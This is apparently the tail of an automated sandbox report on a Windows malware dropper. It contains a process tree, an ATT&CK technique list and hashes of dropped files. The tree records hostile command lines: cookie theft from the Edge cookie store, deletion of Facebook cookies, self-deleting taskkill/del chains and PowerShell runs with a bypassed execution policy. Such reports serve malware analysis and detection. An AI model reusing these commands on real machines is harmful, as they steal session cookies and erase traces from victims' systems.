                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:3912
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5844
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4800
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5596
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:4904
                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1252
                                                                                      • C:\Users\Admin\Documents\KVcH_MEGpaXJmmY_CtU66e2q.exe
                                                                                        "C:\Users\Admin\Documents\KVcH_MEGpaXJmmY_CtU66e2q.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4944
                                                                                        • C:\Users\Admin\Documents\KVcH_MEGpaXJmmY_CtU66e2q.exe
                                                                                          "C:\Users\Admin\Documents\KVcH_MEGpaXJmmY_CtU66e2q.exe" -a
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5000
                                                                                      • C:\Users\Admin\Documents\TMrwMGBeMe_BZn2d5zb1bxhn.exe
                                                                                        "C:\Users\Admin\Documents\TMrwMGBeMe_BZn2d5zb1bxhn.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:1540
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im TMrwMGBeMe_BZn2d5zb1bxhn.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\TMrwMGBeMe_BZn2d5zb1bxhn.exe" & del C:\ProgramData\*.dll & exit
                                                                                          7⤵
                                                                                            PID:5948
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im TMrwMGBeMe_BZn2d5zb1bxhn.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4560
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              8⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:5552
                                                                                        • C:\Users\Admin\Documents\PZLYGfBF9ubB82Ts18uhkMs_.exe
                                                                                          "C:\Users\Admin\Documents\PZLYGfBF9ubB82Ts18uhkMs_.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4044
                                                                                          • C:\Users\Admin\Documents\PZLYGfBF9ubB82Ts18uhkMs_.exe
                                                                                            "C:\Users\Admin\Documents\PZLYGfBF9ubB82Ts18uhkMs_.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:5268
                                                                                        • C:\Users\Admin\Documents\fjdjRtbzM2F8ESMHcwMSI_di.exe
                                                                                          "C:\Users\Admin\Documents\fjdjRtbzM2F8ESMHcwMSI_di.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3748
                                                                                          • C:\Users\Admin\Documents\fjdjRtbzM2F8ESMHcwMSI_di.exe
                                                                                            C:\Users\Admin\Documents\fjdjRtbzM2F8ESMHcwMSI_di.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2876
                                                                                        • C:\Users\Admin\Documents\51cZ9hvqsEqf9_d7Varjdl2N.exe
                                                                                          "C:\Users\Admin\Documents\51cZ9hvqsEqf9_d7Varjdl2N.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          PID:5032
                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                            7⤵
                                                                                              PID:5004
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6064
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6140
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:5296
                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5672
                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks whether UAC is enabled
                                                                                                • Drops file in Program Files directory
                                                                                                PID:3004
                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3840
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5464
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5904
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  8⤵
                                                                                                    PID:5236
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    8⤵
                                                                                                      PID:4664
                                                                                                • C:\Users\Admin\Documents\MYi0r3axBLvcEItTik9fyera.exe
                                                                                                  "C:\Users\Admin\Documents\MYi0r3axBLvcEItTik9fyera.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3188
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4424
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6124
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                      PID:5216
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      7⤵
                                                                                                        PID:720
                                                                                                    • C:\Users\Admin\Documents\idcqyn22t143COVMfy1SMv31.exe
                                                                                                      "C:\Users\Admin\Documents\idcqyn22t143COVMfy1SMv31.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:4316
                                                                                                    • C:\Users\Admin\Documents\mgb94TphWtYlQuWr2QHx5o8n.exe
                                                                                                      "C:\Users\Admin\Documents\mgb94TphWtYlQuWr2QHx5o8n.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5056
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 656
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:3004
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 676
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:4224
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 776
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:4720
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 816
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:4240
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 1128
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:5388
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 1172
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:5676
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 1240
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:5904
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "mgb94TphWtYlQuWr2QHx5o8n.exe" /f & erase "C:\Users\Admin\Documents\mgb94TphWtYlQuWr2QHx5o8n.exe" & exit
                                                                                                        7⤵
                                                                                                          PID:4324
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im "mgb94TphWtYlQuWr2QHx5o8n.exe" /f
                                                                                                            8⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:5584
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 452
                                                                                                    4⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2116
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1344
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:4028
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:2604
                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2212
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1160
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              PID:5416
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                • Modifies registry class
                                                                                                PID:4808
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Executes dropped EXE
                                                                                              PID:4436
                                                                                            • C:\Users\Admin\AppData\Local\Temp\E9FE.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\E9FE.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5776
                                                                                            • C:\Users\Admin\AppData\Local\Temp\EB09.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\EB09.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:6036
                                                                                            • C:\Users\Admin\AppData\Local\Temp\F134.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\F134.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:5880
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:6088
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6072
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:6096
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4624
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5372
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5916
                                                                                                      • C:\Windows\System32\SLUI.exe
                                                                                                        "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5296
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5948
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5184
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:4948
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                              1⤵
                                                                                                                PID:2216
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:5388
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:5616

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                  Persistence

                                                                                                                  Modify Existing Service

                                                                                                                  1
                                                                                                                  T1031

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1060

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  5
                                                                                                                  T1112

                                                                                                                  Disabling Security Tools

                                                                                                                  3
                                                                                                                  T1089

                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                  1
                                                                                                                  T1497

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Install Root Certificate

                                                                                                                  1
                                                                                                                  T1130

                                                                                                                  Credential Access

                                                                                                                  Credentials in Files

                                                                                                                  4
                                                                                                                  T1081

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  6
                                                                                                                  T1012

                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                  1
                                                                                                                  T1497

                                                                                                                  System Information Discovery

                                                                                                                  6
                                                                                                                  T1082

                                                                                                                  Security Software Discovery

                                                                                                                  1
                                                                                                                  T1063

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  Collection

                                                                                                                  Data from Local System

                                                                                                                  4
                                                                                                                  T1005

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                    MD5

                                                                                                                    ed841d4c457ead52231fd3a2ccf235eb

                                                                                                                    SHA1

                                                                                                                    3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                                                                    SHA256

                                                                                                                    1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                                                                    SHA512

                                                                                                                    da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                    MD5

                                                                                                                    9be84148228d38d8a7aa04aa003ae49a

                                                                                                                    SHA1

                                                                                                                    83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                                                                    SHA256

                                                                                                                    eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                                                                    SHA512

                                                                                                                    eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                    MD5

                                                                                                                    4afb418ad4c632c535ce0274f09f8d54

                                                                                                                    SHA1

                                                                                                                    35358b99ca592c1000d2e9e992ffff8d3f84adf8

                                                                                                                    SHA256

                                                                                                                    8fffa60db1ff3c00c349c23281ddaf7b61c386abfb552f80626a331ab6e3f517

                                                                                                                    SHA512

                                                                                                                    397b269a3abafdc77fd8f944c7860aea2bc075e7929f03f1f19d78413522c01e460eb4b8fad1442c439784f22d939615a73351004d024520f6d82762a89674e0

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                    MD5

                                                                                                                    8f8531d1829bd0dd0b7a865024e1a334

                                                                                                                    SHA1

                                                                                                                    ac3a43edfa12b6ab4b53bb199726faf0b0268c2d

                                                                                                                    SHA256

                                                                                                                    39ae10a8e7fcec043da12254da4c2e4a980c2a26c07b9199f87ef661aeeb2949

                                                                                                                    SHA512

                                                                                                                    d27b2282045b2ce0da2a71991be5347add7d9a833a47c860f11a564b4807ac184f9a4687524ef56c04c772556edd62df37e928f0765c72028fcdaa2f086481d7

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\libcurl.dll
                                                                                                                    MD5

                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                    SHA1

                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                    SHA256

                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                    SHA512

                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\libcurlpp.dll
                                                                                                                    MD5

                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                    SHA1

                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                    SHA256

                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                    SHA512

                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\libgcc_s_dw2-1.dll
                                                                                                                    MD5

                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                    SHA1

                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                    SHA256

                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                    SHA512

                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\libstdc++-6.dll
                                                                                                                    MD5

                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                    SHA1

                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                    SHA256

                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                    SHA512

                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\libwinpthread-1.dll
                                                                                                                    MD5

                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                    SHA1

                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                    SHA256

                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                    SHA512

                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\setup_install.exe
                                                                                                                    MD5

                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                    SHA1

                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                    SHA256

                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                    SHA512

                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\setup_install.exe
                                                                                                                    MD5

                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                    SHA1

                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                    SHA256

                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                    SHA512

                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.exe
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.exe
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.txt
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_2.exe
                                                                                                                    MD5

                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                    SHA1

                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                    SHA256

                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                    SHA512

                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_2.txt
                                                                                                                    MD5

                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                    SHA1

                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                    SHA256

